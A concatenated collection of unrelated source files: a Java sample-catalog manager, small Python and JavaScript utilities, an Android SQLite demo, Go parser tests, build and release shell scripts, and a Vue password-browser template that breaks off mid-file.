    public QueryResult<Sample> readAll(int studyId, QueryOptions query, QueryOptions options, String sessionId) throws CatalogException {
        ParamUtils.checkObj(query, "query");
        options = ParamUtils.defaultObject(options, QueryOptions::new);
        ParamUtils.checkParameter(sessionId, "sessionId");

        String userId = userDBAdaptor.getUserIdBySessionId(sessionId);
        if (!authorizationManager.getStudyACL(userId, studyId).isRead()) {
            throw new CatalogException("Permission denied. User " + userId + " can't read study");
        }
        // The adaptor expects query and pagination options merged into one map.
        query.putAll(options);
        return sampleDBAdaptor.getAllSamples(studyId, query);
    }

    /** Variant of {@link #readAll(int, QueryOptions, QueryOptions, String)} taking studyId from the query. */
    @Override
    public QueryResult<Sample> readAll(QueryOptions query, QueryOptions options, String sessionId) throws CatalogException {
        ParamUtils.checkObj(query, "query");
        return readAll(query.getInt("studyId", -1), query, options, sessionId);
    }

    /** Not supported yet. */
    @Override
    public QueryResult<Sample> update(Integer id, ObjectMap parameters, QueryOptions options, String sessionId) throws CatalogException {
        throw new UnsupportedOperationException();
    }

    /** Not supported yet. */
    @Override
    public QueryResult<Sample> delete(Integer id, QueryOptions options, String sessionId) throws CatalogException {
        throw new UnsupportedOperationException();
    }

    /*
     * Variables Methods
     */

    /**
     * Creates a variable set from a list of variables, rejecting duplicates
     * before delegating to the set-based overload.
     */
    @Override
    public QueryResult<VariableSet> createVariableSet(int studyId, String name, Boolean unique,
                                                      String description, Map<String, Object> attributes,
                                                      List<Variable> variables, String sessionId)
            throws CatalogException {
        ParamUtils.checkObj(variables, "Variables List");
        Set<Variable> variablesSet = new HashSet<>(variables);
        if (variables.size() != variablesSet.size()) {
            throw new CatalogException("Error. Repeated variables");
        }
        return createVariableSet(studyId, name, unique, description, attributes, variablesSet, sessionId);
    }

    /**
     * Creates a variable set in a study. Requires write permission.
     * Missing optional fields of each variable are normalised to empty defaults
     * before the whole set is validated.
     */
    @Override
    public QueryResult<VariableSet> createVariableSet(int studyId, String name, Boolean unique,
                                                      String description, Map<String, Object> attributes,
                                                      Set<Variable> variables, String sessionId)
            throws CatalogException {
        // BUG FIX: validate sessionId before using it. The original called
        // getUserIdBySessionId(sessionId) first, dereferencing an unchecked
        // parameter ahead of ParamUtils.checkParameter.
        ParamUtils.checkParameter(sessionId, "sessionId");
        ParamUtils.checkParameter(name, "name");
        ParamUtils.checkObj(variables, "Variables Set");
        String userId = userDBAdaptor.getUserIdBySessionId(sessionId);
        unique = ParamUtils.defaultObject(unique, true);
        description = ParamUtils.defaultString(description, "");
        attributes = ParamUtils.defaultObject(attributes, new HashMap<String, Object>());

        for (Variable variable : variables) {
            ParamUtils.checkParameter(variable.getId(), "variable ID");
            ParamUtils.checkObj(variable.getType(), "variable Type");
            variable.setAllowedValues(ParamUtils.defaultObject(variable.getAllowedValues(), Collections.<String>emptyList()));
            variable.setAttributes(ParamUtils.defaultObject(variable.getAttributes(), Collections.<String, Object>emptyMap()));
            variable.setCategory(ParamUtils.defaultString(variable.getCategory(), ""));
            variable.setDependsOn(ParamUtils.defaultString(variable.getDependsOn(), ""));
            variable.setDescription(ParamUtils.defaultString(variable.getDescription(), ""));
//            variable.setRank(defaultString(variable.getDescription(), ""));
        }

        if (!authorizationManager.getStudyACL(userId, studyId).isWrite()) {
            throw new CatalogException("Permission denied. User " + userId + " can't modify study");
        }

        VariableSet variableSet = new VariableSet(-1, name, unique, description, variables, attributes);
        CatalogSampleAnnotationsValidator.checkVariableSet(variableSet);

        return sampleDBAdaptor.createVariableSet(studyId, variableSet);
    }

    /** Reads a variable set; requires read permission on its study. */
    @Override
    public QueryResult<VariableSet> readVariableset(int variableSet, QueryOptions options, String sessionId) throws CatalogException {
        String userId = userDBAdaptor.getUserIdBySessionId(sessionId);
        int studyId = sampleDBAdaptor.getStudyIdByVariableSetId(variableSet);
        if (!authorizationManager.getStudyACL(userId, studyId).isRead()) {
            throw new CatalogException("Permission denied. User " + userId + " can't read study");
        }
        return sampleDBAdaptor.getVariableSet(variableSet, options);
    }

    /**
     * Cohort methods
     * ***************************
     */

    /** Returns the id of the study that owns the given cohort. */
    @Override
    public int getStudyIdByCohortId(int cohortId) throws CatalogException {
        return sampleDBAdaptor.getStudyIdByCohortId(cohortId);
    }

    /** Reads a cohort; requires read permission on its study. */
    @Override
    public QueryResult<Cohort> readCohort(int cohortId, QueryOptions options, String sessionId) throws CatalogException {
        ParamUtils.checkParameter(sessionId, "sessionId");

        int studyId = sampleDBAdaptor.getStudyIdByCohortId(cohortId);
        String userId = userDBAdaptor.getUserIdBySessionId(sessionId);

        if (authorizationManager.getStudyACL(userId, studyId).isRead()) {
            return sampleDBAdaptor.getCohort(cohortId);
        } else {
            throw CatalogAuthorizationException.cantRead(userId, "Cohort", cohortId, null);
        }
    }

    /**
     * Creates a cohort after verifying that every referenced sample exists in
     * the study (compared by result count against the requested id list).
     */
    @Override
    public QueryResult<Cohort> createCohort(int studyId, String name, String description, List<Integer> sampleIds,
                                            Map<String, Object> attributes, String sessionId) throws CatalogException {
        ParamUtils.checkParameter(name, "name");
        ParamUtils.checkObj(sampleIds, "Samples list");
        description = ParamUtils.defaultString(description, "");
        attributes = ParamUtils.defaultObject(attributes, HashMap<String, Object>::new);

        if (readAll(studyId, new QueryOptions("id", sampleIds), null, sessionId).getResult().size() != sampleIds.size()) {
            throw new CatalogException("Error: Some sampleId does not exist in the study " + studyId);
        }
        Cohort cohort = new Cohort(name, TimeUtils.getTime(), description, sampleIds, attributes);
        return sampleDBAdaptor.createCohort(studyId, cohort);
    }

}
|
def format_name(firstName, lastName, age):
    """Return a "<last>, <first> is <age> years old." description string."""
    return "{}, {} is {} years old.".format(lastName, firstName, age)


# Usage example
print(format_name('John', 'Doe', 35))  # Output: Doe, John is 35 years old.
# Evaluate the 512+0+512 N-VB-IP language model on the wikitext-103 validation
# split, applying the "keep only nouns/verbs/adjectives/adverbs in the first
# half" augmentation and scoring only the last element (batch size 1).
python transformers/examples/language-modeling/run_language_modeling.py --model_name_or_path train-outputs/512+0+512-N-VB-IP/model --tokenizer_name model-configs/1024-config --eval_data_file ../data/wikitext-103-raw/wiki.valid.raw --output_dir eval-outputs/512+0+512-N-VB-IP/512+0+512-N-VB-ADJ-ADV-1 --do_eval --per_device_eval_batch_size 1 --dataloader_drop_last --augmented --augmentation_function remove_all_but_nouns_verbs_adjectives_and_adverbs_first_half_full --eval_function last_element_eval
/**
 * Reconstruct the queue so that each person [h, k] ends up with exactly k
 * people of height >= h in front of them (LeetCode 406).
 * @param {number[][]} people - array of [height, k] pairs
 * @return {number[][]} the reconstructed queue
 */
var reconstructQueue = function(people) {
    // Tallest first, ties broken by ascending k. (Sorts `people` in place,
    // matching the original implementation's side effect.)
    people.sort((a, b) => (a[0] === b[0] ? a[1] - b[1] : b[0] - a[0]));
    // Inserting shorter people later cannot break taller people's k counts,
    // so each person can simply be spliced in at index k.
    const queue = [];
    people.forEach(person => queue.splice(person[1], 0, person));
    return queue;
};
/**
 * (h, k)
 * [[7,0], [4,4], [7,1], [5,0], [6,1], [5,2]]
 * First sort by height h descending, and by k ascending.
 * Taller people have less to worry about: nobody taller can appear in front of them.
 * [[7,0], [7,1], [6,1], [5,0], [5,2], [4,4]]
 * Then insert the tallest people first
 * [[7,0], [7,1]] — people of equal height are ordered by ascending k.
 * Next, insert the second tallest at the index given by its k value.
 * [[7,0], [6,1], [7,1]]
 * Repeat the steps above:
 * [[5,0], [7,0], [6,1], [7,1]]
 * [[5,0], [7,0], [5,2], [6,1], [7,1]]
 * [[5,0], [7,0], [5,2], [6,1], [4,4], [7,1]]
 */
|
import android.app.Activity;
import android.database.Cursor;
import android.database.sqlite.SQLiteDatabase;
import android.os.Bundle;
import android.support.v7.app.AppCompatActivity;
import android.util.Log;
import android.widget.TextView;
public class MainActivity extends AppCompatActivity {
TextView textView;
SQLiteDatabase sqLiteDatabase;
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_main);
textView = findViewById(R.id.textView);
sqLiteDatabase = this.openOrCreateDatabase("Users", MODE_PRIVATE, null);
// Create
sqLiteDatabase.execSQL("CREATE TABLE IF NOT EXISTS users (name VARCHAR, age INTEGER(3))");
sqLiteDatabase.execSQL("INSERT INTO users (name, age) VALUES ('John', 24)");
sqLiteDatabase.execSQL("INSERT INTO users (name, age) VALUES ('Jane', 22)");
sqLiteDatabase.execSQL("INSERT INTO users (name, age) VALUES ('Max', 28)");
// Read
Cursor c =sqLiteDatabase.rawQuery("SELECT * FROM users", null);
int nameIndex = c.getColumnIndex("name");
int ageIndex = c.getColumnIndex("age");
c.moveToFirst();
while (c !=null)
{
String name = c.getString(nameIndex);
String age = c.getString(ageIndex);
Log.i("Name", name);
Log.i("Age", age);
c.moveToNext();
}
// Update
sqLiteDatabase.execSQL("UPDATE users SET age = 25 WHERE name = 'John'");
// Delete
sqLiteDatabase.execSQL("DELETE FROM users WHERE name = 'Max' ");
}
} |
<filename>Java/ExerciciosExtras/exercicios/pilaresoo/Pelo.java<gh_stars>1-10
package ExerciciosExtras.exercicios.pilaresoo;
/**
 * Coat-length categories ("pelo" = fur) used by the OOP-pillars exercise:
 * short (CURTO), medium (MEDIO) and long (LONGO).
 */
public enum Pelo {
    CURTO, MEDIO, LONGO
}
def pattern_match(str, substr):
    """Naive substring search: True iff `substr` occurs in `str`.

    On a mismatch the scan restarts one position after the current
    alignment's start (i - j + 1) with the pattern index reset to 0.
    An empty `substr` matches trivially.
    """
    i = j = 0
    while i < len(str) and j < len(substr):
        if str[i] == substr[j]:
            i += 1
            j += 1
        else:
            i -= j - 1
            j = 0
    return j == len(substr)
# Example: search for "Geeks" inside "GeeksforGeeks".
# NOTE: the name `str` shadows the built-in within this script.
str = "GeeksforGeeks"
substr = "Geeks"
if (pattern_match(str, substr)):
    print("Substring found")
else:
    print("Substring not found")
package traversal
import (
"testing"
"github.com/KeisukeYamashita/go-vcl/internal/lexer"
"github.com/KeisukeYamashita/go-vcl/internal/parser"
)
func TestContents(t *testing.T) {
testCases := []struct {
input string
expectedAttrCount int
expectedBlockCount int
}{
{
`x = 10`,
1,
0,
},
{
`acl type name {
"local"
}`,
0,
1,
}, {
`sub pipe_if_local { x }`,
0,
1,
},
}
for n, tc := range testCases {
l := lexer.NewLexer(tc.input)
p := parser.NewParser(l)
program := p.ParseProgram()
content := Content(program)
if len(content.Attributes) != tc.expectedAttrCount {
t.Fatalf("contents.Attributes length failed[testcase:%d], got:%d, want:%d", n, len(content.Attributes), tc.expectedAttrCount)
}
if len(content.Blocks) != tc.expectedBlockCount {
t.Fatalf("contents.Blocks length failed[testcase:%d], got:%d, want:%d", n, len(content.Blocks), tc.expectedBlockCount)
}
}
}
func TestConvertBody(t *testing.T) {
testCases := []struct {
input string
expectedAttrCount int
expectedBlockCount int
}{
{
`x = 10`,
1,
0,
},
{
`acl type name {
"local"
}`,
0,
1,
}, {
`sub pipe_if_local { x }`,
0,
1,
},
}
for n, tc := range testCases {
l := lexer.NewLexer(tc.input)
p := parser.NewParser(l)
program := p.ParseProgram()
content := convertBody(program.Statements)
if len(content.Attributes) != tc.expectedAttrCount {
t.Fatalf("contents.Attributes length failed[testcase:%d], got:%d, want:%d", n, len(content.Attributes), tc.expectedAttrCount)
}
if len(content.Blocks) != tc.expectedBlockCount {
t.Fatalf("contents.Blocks length failed[testcase:%d], got:%d, want:%d", n, len(content.Blocks), tc.expectedBlockCount)
}
}
}
|
#!/usr/bin/env bash
# Runs k8s.io/code-generator against this repository's API types
# (clients, informers, listers for the ecr:v1alpha1 group).
set -o errexit
set -o nounset
set -o pipefail

REPO=github.com/gugahoi/memento
HEADER_FILE="${GOPATH}/src/${REPO}/hack/boilerplate.go.txt"

# ROBUSTNESS: expansions are quoted — unquoted ${GOPATH}/${HEADER_FILE} would
# word-split on paths containing spaces and break the generator invocation.
pushd "${GOPATH}/src/k8s.io/code-generator"

echo "--- Generating Internal Groups"
./generate-internal-groups.sh \
    all \
    "${REPO}/pkg/client" \
    "${REPO}/pkg/apis" \
    "${REPO}/pkg/apis" \
    "ecr:v1alpha1" \
    --go-header-file "${HEADER_FILE}"

echo "--- Generating Groups"
./generate-groups.sh \
    all \
    "${REPO}/pkg/client" \
    "${REPO}/pkg/apis" \
    "ecr:v1alpha1" \
    --go-header-file "${HEADER_FILE}"

popd
|
class Car:
    """Simple record of a car's make, model, color and model year."""

    def __init__(self, make, model, color, year):
        # Store every descriptor exactly as supplied by the caller.
        self.make, self.model, self.color, self.year = make, model, color, year

    def getMake(self):
        """Return the manufacturer name."""
        return self.make

    def getModel(self):
        """Return the model name."""
        return self.model

    def getColor(self):
        """Return the color."""
        return self.color

    def getYear(self):
        """Return the model year."""
        return self.year
<reponame>MorganEJLA/portfolio-dev<filename>js/index.js
const navToggle = document.querySelector('.nav-toggle');
const navLinks = document.querySelectorAll('.nav__link')

// Toggle the mobile navigation drawer via a class on <body>.
navToggle.addEventListener('click', () => {
    document.body.classList.toggle('nav-open');
});

// Close the drawer whenever a navigation link is chosen.
navLinks.forEach(link => {
    link.addEventListener('click', () => {
        document.body.classList.remove('nav-open');
    })
})

// Back-to-top button element.
var topButton = document.getElementById("topBtn");

// Show the button once the page is scrolled down.
// NOTE(review): original comment said "after 20px", but scrollFunction uses a
// 2400px threshold — confirm which value is intended.
window.onscroll = function() {scrollFunction()};
// Show the back-to-top button only once the page has scrolled past 2400px.
// Both document.body and document.documentElement are checked because
// browsers disagree on which element carries the scroll offset.
function scrollFunction() {
    const pastThreshold =
        document.body.scrollTop > 2400 || document.documentElement.scrollTop > 2400;
    topButton.style.display = pastThreshold ? "block" : "none";
}
// When the user clicks the button, scroll back to the top of the page.
function topFunction() {
    // Reset both possible scroll roots (browser-dependent).
    for (const el of [document.body, document.documentElement]) {
        el.scrollTop = 0;
    }
}
#
# created by vincentqin 2021.1.16
# export match pairs using DIR which can be used in SFM feature matching.
#
# setting paths
export DIR_ROOT=$PWD
export DB_ROOT=/PATH/TO/YOUR/DATASETS

workspace_path=$PWD
dataset_name="scene1"
input_datasets='ImageList("outputs/scene1.txt")'
images_path=$DB_ROOT
topN=50

###################################################################
# DO NOT EDIT THE FOLLOWING LINES IF YOU KNOW HOW TO DO WITH IT.
###################################################################
# create working directories on first run
if [ ! -d "$PWD/pairs" ]; then
    mkdir -p "$PWD/pairs"
fi
if [ ! -d "$PWD/outputs" ]; then
    mkdir -p "$PWD/outputs"
fi

# generate images list
images_list=$workspace_path/outputs/$dataset_name.txt # DON'T EDIT!!!
python get_images_list.py --input "$images_path" --outputs "$images_list"

# extract features (skipped if the descriptor file already exists)
db_desc_path=$workspace_path/outputs/$dataset_name.npy
if [ ! -f "$db_desc_path" ]; then
    python -m dirtorch.extract_features --dataset "${input_datasets}" \
        --checkpoint dirtorch/data/Resnet101-AP-GeM.pt \
        --output "$db_desc_path" \
        --whiten Landmarks_clean --whitenp 0.25 --gpu 0
fi

# export pairs
pairs_file_path=$PWD/pairs/pairs-db-dir$topN.txt
# BUG FIX: `python -m` takes a MODULE name, not a file name. The original
# `python -m dirtorch.test_custom.py` fails with "No module named
# dirtorch.test_custom.py"; the extract_features call above shows the
# correct invocation style.
python -m dirtorch.test_custom --dataset "${input_datasets}" \
    --checkpoint dirtorch/data/Resnet101-AP-GeM.pt \
    --whiten Landmarks_clean --whitenp 0.25 --gpu 0 \
    --load-feats "$db_desc_path" \
    --out-json "$PWD/outputs/${dataset_name}_query.json" \
    --images_path "$images_path" \
    --output_pairs "$pairs_file_path" \
    --topN $topN
/* http://keith-wood.name/timeEntry.html
   Vietnamese template for the jQuery time entry extension
   Written by <NAME> (<EMAIL>). */
(function($) {
	// Vietnamese localisation: 12-hour clock with ':' separator.
	// spinnerTexts are the tooltips for [now, previous field, next field,
	// increment, decrement].
	$.timeEntry.regional['vi'] = {show24Hours: false, separator: ':',
		ampmPrefix: '', ampmNames: ['AM', 'PM'],
		spinnerTexts: ['Hiện tại', 'Mục trước', 'Mục sau', 'Tăng', 'Giảm']};
	// Make Vietnamese the active default locale for all time-entry fields.
	$.timeEntry.setDefaults($.timeEntry.regional['vi']);
})(jQuery);
<gh_stars>0
import { BadRequestException, HttpException, HttpStatus } from '@nestjs/common';
/**
 * Application-level HTTP 400 error.
 *
 * Thin wrapper over NestJS's {@link BadRequestException} that narrows the
 * constructor to a single required string message.
 */
export class BadRequest extends BadRequestException {
  constructor(message: string) {
    super(message);
  }
}
|
package io.github.jlprat.akka.http.workshop.rejectionException
import akka.http.scaladsl.model.StatusCodes
import akka.http.scaladsl.testkit.ScalatestRouteTest
import org.scalatest.{FlatSpec, Matchers}
/**
* Created by @jlprat on 20/04/2017.
*/
/**
 * Route tests for RejectionsExceptionsExample: exercises its customised
 * rejection responses (404, 405) and exception responses (arithmetic error
 * vs. any other exception).
 */
class RejectionsExceptionsExampleSpec extends FlatSpec with ScalatestRouteTest with Matchers {

  // Routes under test, instantiated once for the whole spec.
  private val routeToTest = new RejectionsExceptionsExample().routes

  "RejectionExceptionsExample" should "have a personalized message for 404" in {
    Get("/not/existing") ~> routeToTest ~> check {
      status shouldBe StatusCodes.NotFound
      responseAs[String] shouldBe "Nothing to see here!"
    }
  }

  it should "have a personalized message for wrong method" in {
    // PUT against a GET-only endpoint should yield the custom 405 body.
    Put("/getonly") ~> routeToTest ~> check {
      status shouldBe StatusCodes.MethodNotAllowed
      responseAs[String] shouldBe "Have you tried with more conventional methods?"
    }
  }

  it should "provide special message when arithmetic exceptions" in {
    // Division by zero maps to a dedicated 500 body.
    Get("/division/2/0") ~> routeToTest ~> check {
      status shouldBe StatusCodes.InternalServerError
      responseAs[String] shouldBe "Do you math?"
    }
  }

  it should "provide default message for any other exception" in {
    Get("/crash") ~> routeToTest ~> check {
      status shouldBe StatusCodes.InternalServerError
      responseAs[String] shouldBe "There was an internal server error."
    }
  }
}
|
// begin-snippet: piped_arguments_options_notify
$ users.exe list -i | users.exe Welcome c3 --notify $*
welcome Cris
notify: a1 Avery (active)
notify: b1 Beatrix (active)
// end-snippet |
<filename>examples/filters/indices.js
module.exports = {
  type: 'index',
  /**
   * Any indices that trigger this predicate will be excluded from transfer.
   * NOTE(review): the predicate returns true for every index EXCEPT
   * 'log_data_2016-12-01', so as described it would exclude everything but
   * that one index. If the intent is to skip only the log index, the
   * predicate semantics are more likely "keep" — confirm against the
   * consumer of these filter modules.
   * @param index - Full index configuration
   */
  predicate: (index) => index.name !== 'log_data_2016-12-01'
};
#!/bin/bash -e
# Collect generated TypeScript declaration files into dist/types,
# preserving their directory layout.
rm -rf dist/types
# ROBUSTNESS: -p also creates the parent "dist" directory, so the script no
# longer fails on a clean checkout where dist/ does not exist yet.
mkdir -p dist/types
cd tools/tmp/modern
# cpio -pdm: copy-pass mode, creating directories and keeping mtimes.
find . -name '*.d.ts' | cpio -pdm ../../../dist/types/
|
package at.doml.fnc.lab1
import at.doml.fnc.lab1.domain.{Domain, DomainElement}
import at.doml.fnc.lab1.relations.Relations
import at.doml.fnc.lab1.set.MutableFuzzySet
/**
 * Lab task 4: builds four fuzzy relations over U x U (U = {1..5}) and checks
 * relation properties: domain shape, symmetry, reflexivity and max-min
 * transitivity.
 */
object Task4 extends App {

  // U = {1, 2, 3, 4, 5}; u2 = U x U is the domain of every relation below.
  val u = Domain.intRange(1, 6)
  val u2 = Domain.combine(u, u)

  // r1: identity pairs at 1.0 plus symmetric (3,1)/(1,3) at 0.5.
  val r1 = new MutableFuzzySet(u2)
    .set(DomainElement.of(1, 1), 1)
    .set(DomainElement.of(2, 2), 1)
    .set(DomainElement.of(3, 3), 1)
    .set(DomainElement.of(4, 4), 1)
    .set(DomainElement.of(5, 5), 1)
    .set(DomainElement.of(3, 1), 0.5)
    .set(DomainElement.of(1, 3), 0.5)

  // r2: like r1 but (3,1) and (1,3) differ (0.5 vs 0.1), breaking symmetry.
  val r2 = new MutableFuzzySet(u2)
    .set(DomainElement.of(1, 1), 1)
    .set(DomainElement.of(2, 2), 1)
    .set(DomainElement.of(3, 3), 1)
    .set(DomainElement.of(4, 4), 1)
    .set(DomainElement.of(5, 5), 1)
    .set(DomainElement.of(3, 1), 0.5)
    .set(DomainElement.of(1, 3), 0.1)

  // r3: (3,3) is only 0.3, so the relation is not reflexive.
  val r3 = new MutableFuzzySet(u2)
    .set(DomainElement.of(1, 1), 1)
    .set(DomainElement.of(2, 2), 1)
    .set(DomainElement.of(3, 3), 0.3)
    .set(DomainElement.of(4, 4), 1)
    .set(DomainElement.of(5, 5), 1)
    .set(DomainElement.of(1, 2), 0.6)
    .set(DomainElement.of(2, 1), 0.6)
    .set(DomainElement.of(2, 3), 0.7)
    .set(DomainElement.of(3, 2), 0.7)
    .set(DomainElement.of(3, 1), 0.5)
    .set(DomainElement.of(1, 3), 0.5)

  // r4: fully reflexive and symmetric, used for the transitivity check.
  val r4 = new MutableFuzzySet(u2)
    .set(DomainElement.of(1, 1), 1)
    .set(DomainElement.of(2, 2), 1)
    .set(DomainElement.of(3, 3), 1)
    .set(DomainElement.of(4, 4), 1)
    .set(DomainElement.of(5, 5), 1)
    .set(DomainElement.of(1, 2), 0.4)
    .set(DomainElement.of(2, 1), 0.4)
    .set(DomainElement.of(2, 3), 0.5)
    .set(DomainElement.of(3, 2), 0.5)
    .set(DomainElement.of(1, 3), 0.4)
    .set(DomainElement.of(3, 1), 0.4)

  // Print each property check.
  val test1 = Relations.isUTimesURelation(r1)
  println(s"r1 is defined over UxU? $test1")

  val test2 = Relations.isSymmetric(r1)
  println(s"r1 is symmetric? $test2")

  val test3 = Relations.isSymmetric(r2)
  println(s"r2 is symmetric? $test3")

  val test4 = Relations.isReflexive(r1)
  println(s"r1 is reflexive? $test4")

  val test5 = Relations.isReflexive(r3)
  println(s"r3 is reflexive? $test5")

  val test6 = Relations.isMaxMinTransitive(r3)
  println(s"r3 is max-min transitive? $test6")

  val test7 = Relations.isMaxMinTransitive(r4)
  println(s"r4 is max-min transitive? $test7")
}
|
#!/bin/bash
# Run the course-site container; an optional first argument overrides the
# image name (defaults to ucb-datalab-site).
# IDIOM FIX: replaced the `$([ ! -z "$1" ] && echo "$1" || echo default)`
# subshell dance with the standard ${1:-default} expansion, and quoted the
# expansions so paths/names with spaces cannot word-split.
DOCKER_CONTAINER="${1:-ucb-datalab-site}"
echo "Site will run on localhost:4000"
docker run --rm -p 4000:4000 -v "$(pwd):/site" "$DOCKER_CONTAINER:latest"
|
#!/usr/bin/env bash
# Smoke test for an R Singularity image: R inside the container must report
# the same version as the image's R_VERSION metadata label.
export SINGULARITY_IMAGE="${SINGULARITY_IMAGE:-singularity-r.simg}"
echo "Using Singularity image: ${SINGULARITY_IMAGE}"

# Extract the R_VERSION value from the image's inspect output
# (labels are printed as JSON, hence the quote-delimited awk field).
version () {
    singularity inspect "${SINGULARITY_IMAGE}" | \
        grep "R_VERSION" | \
        awk -F'"' '{print $4}'
}

set -e
set -x
# Verify R version
# BUG FIX: `singularity exec` requires the image as its first argument; the
# original omitted it, so "R" would have been treated as the image path.
singularity exec "${SINGULARITY_IMAGE}" R -q -e "stopifnot(getRversion() == '$(version)')"
{ set +x; } 2>/dev/null
echo "All tests passed!"
|
#!/bin/bash
# Search the lz4-compressed dump for an extended-regex pattern.
#   $1 — the grep -E pattern
#   $2 — NOTE(review): appears to carry optional extra grep flags; it is left
#        unquoted on purpose so it disappears entirely when empty and
#        word-splits into separate flags when set — confirm the intended
#        calling convention. The echo below previews the command being run.
echo grep -aE "$2" '"'"$1"'"'
lz4cat slim.topcode.1000.txt.lz4 | grep -aE $2 "$1"
|
#!/bin/bash
# Tag the version from package.json, push it, create the matching GitHub
# release, and attach every file under dist/.
CURRENT_VERSION=$(cat package.json | jq -r .version)

# Fail early: github-release needs the token to authenticate.
if [[ "$GITHUB_TOKEN" == "" ]]; then
    echo "Set GITHUB_TOKEN first"
    exit 1
fi

echo v$CURRENT_VERSION

echo "pushing this release"
git tag "v$CURRENT_VERSION"
git push
git push --tags

echo "creating github release"
github-release release -u bernhard-42 -r three-cad-viewer -t "v$CURRENT_VERSION" -n "three-cad-viewer-$CURRENT_VERSION"
# Give GitHub a moment to materialise the release before uploading assets.
sleep 5

# ROBUSTNESS: "$f" and "$(basename "$f")" are quoted so artifact names
# containing spaces no longer word-split and break the upload.
for f in dist/*; do
    echo "$f"
    github-release upload -u bernhard-42 -r three-cad-viewer -t "v$CURRENT_VERSION" -n "$(basename "$f")" -f "$f"
done
|
#!/bin/bash
# This script regenerates the root AUTHORS file with everyone who has
# contributed to the project (one line per unique commit author).
# The existence check doubles as a "run from the repo root" guard: the file
# is only rewritten when an AUTHORS file is already present.
if [ ! -f AUTHORS ]; then
    echo "AUTHORS file not found. Are you not in the root directory?"
else
    # Overwrite with a header, then append the de-duplicated author list.
    echo -e "This AUTHORS file is generated by ./script/authors.sh\nThank you to everyone whom has contributed to livecli / livestreamer.\n\n" > AUTHORS
    git log --format='%aN' | sort -u >> AUTHORS
fi
|
/**
 * Minimal jQuery-AJAX wrapper with one static helper per HTTP verb.
 * Failures are surfaced to the user through toastr notifications.
 */
class $q
{
    static get(url, data)    { return $q.request('GET', url, data); }
    static put(url, data)    { return $q.request('PUT', url, data); }
    static post(url, data)   { return $q.request('POST', url, data); }
    static patch(url, data)  { return $q.request('PATCH', url, data); }
    static delete(url, data) { return $q.request('DELETE', url, data); }

    /**
     * Issue a JSON request and attach the shared failure handler.
     * Returns the jqXHR so callers can chain .done()/.fail().
     */
    static request(method, url, data) {
        return jQuery.ajax({ method, url, data, dataType: 'json' })
            .fail(response => {
                const body = response.responseJSON;
                // No parsed JSON body means the server replied with something unexpected.
                if (typeof body === 'undefined') {
                    toastr.error(`Received a non-JSON ${response.status} response from the server.`, 'Something went wrong!');
                    return;
                }
                // errorDescription may be a single string or an array of messages.
                const msg = typeof body.errorDescription === 'object'
                    ? body.errorDescription.join('<br>')
                    : body.errorDescription;
                const title = body.error.toUpperCase();
                // Validation problems (400) are warnings; anything else is an error.
                if (response.status === 400)
                    toastr.warning(msg, title);
                else
                    toastr.error(msg, title);
            });
    }
}
// Password-browser screen: folder breadcrumb navigation plus grid/list views
// of folders and password entries, with show/copy actions per password.
let Passwords = Vue.extend({
    template: `<section class="password screen">
        <article class="ui message">
            <div class="ui big breadcrumb">
                <a class="section" @click="openBreadcrumbFolder('root')">Root</a>
                <span v-for="folder in breadcrumb">
                    <i class="right chevron icon divider"></i>
                    <a class="section" @click="openBreadcrumbFolder(folder)">{{ folder.name }}</a>
                </span>
            </div>
        </article>
        <article class="ui grid lockd controls">
            <div class="ten wide column">
                <div class="ui input">
                    <input type="text" placeholder="Filter" v-model="filter">
                </div>
            </div>
            <div class="six wide column">
                <div class="ui two basic icon buttons">
                    <button class="ui button" :class="{'active': layout == 'grid'}" @click="setLayout('grid')">
                        <i class="block layout icon"></i>
                        Grid
                    </button>
                    <button class="ui button" :class="{'active': layout == 'list'}" @click="setLayout('list')">
                        <i class="list layout icon"></i>
                        List
                    </button>
                </div>
            </div>
        </article>
        <article v-if="layout == 'grid'">
            <div class="ui grid">
                <div class="three wide computer four wide tablet column" v-for="folder in folders | filterBy filter in 'name'">
                    <div class="ui fluid link card" @click="openFolder(folder)">
                        <div class="image">
                            <img src="/images/folder.png" alt="Folder">
                        </div>
                        <div class="center aligned content">
                            <div class="header">{{ folder.name }}</div>
                        </div>
                    </div>
                </div>
            </div>
            <div class="ui grid" v-if="passwords.length > 0">
                <div class="four wide computer sixteen wide tablet column" v-for="password in passwords | filterBy filter in 'name'">
                    <div class="ui fluid card">
                        <div class="content">
                            <div class="header">{{ password.name }}</div>
                            <table class="ui table">
                                <tbody>
                                    <tr>
                                        <td><strong>URL</strong></td>
                                        <td><a href="{{ password.url || '' }}">{{ password.url || 'none' }}</a></td>
                                    </tr>
                                    <tr>
                                        <td><strong>User</strong></td>
                                        <td>{{ password.user || 'none' }}</td>
                                    </tr>
                                    <tr>
                                        <td><strong>Password</strong></td>
                                        <td><span id="password_{{ password.id }}">******</span></td>
                                    </tr>
                                </tbody>
                            </table>
                        </div>
                        <div class="ui two bottom attached buttons">
                            <button class="ui blue labeled icon button" @click="showPassword(password.id)">
                                <i class="search icon"></i>
                                Show Password
                            </button>
                            <button class="ui primary labeled icon button" @click="copyPassword(password.id)">
                                <i class="copy icon"></i>
                                Copy Password
                            </button>
                        </div>
                    </div>
                </div>
            </div>
        </article>
        <article v-if="layout == 'list'" class="ui segment">
            <div class="ui relaxed divided list">
                <div class="item" v-for="folder in folders | filterBy filter in 'name'" @click="openFolder(folder)">
                    <i class="large folder middle aligned icon"></i>
                    <div class="content">
                        <a class="header">{{ folder.name }}</a>
                        <div class="description">
                            Contains {{ typeof folder.folder_count === 'undefined' ? '???' : folder.folder_count }} folders and {{ typeof folder.password_count === 'undefined' ? '???' : folder.password_count }} passwords
                        </div>
                    </div>
                </div>
                <div class="item" v-for="password in passwords | filterBy filter in 'name'" @click="showPasswordDetails(password)">
                    <i class="large key middle aligned icon"></i>
                    <div class="content">
                        <a class="header">{{ password.name }}</a>
                        <div class="description">User: {{ password.user || 'no user' }}</div>
                        <div class="details" v-if="password.id == activePassword.id" transition="fade">
                            <div class="ui attached segment">
                                <table class="ui table">
                                    <tbody>
                                        <tr>
                                            <td>User</td>
                                            <td>{{ password.user }}</td>
                                        </tr>
                                        <tr>
                                            <td>URL</td>
                                            <td><a href="{{ password.url }}">{{ password.url }}</a></td>
                                        </tr>
                                        <tr>
                                            <td>Password</td>
                                            <td><span id="password_{{ password.id }}">******</span></td>
                                        </tr>
                                    </tbody>
                                </table>
                            </div>
                            <div class="ui two bottom attached buttons">
                                <button class="ui blue labeled icon button" @click="showPassword(password.id)">
                                    <i class="search icon"></i>
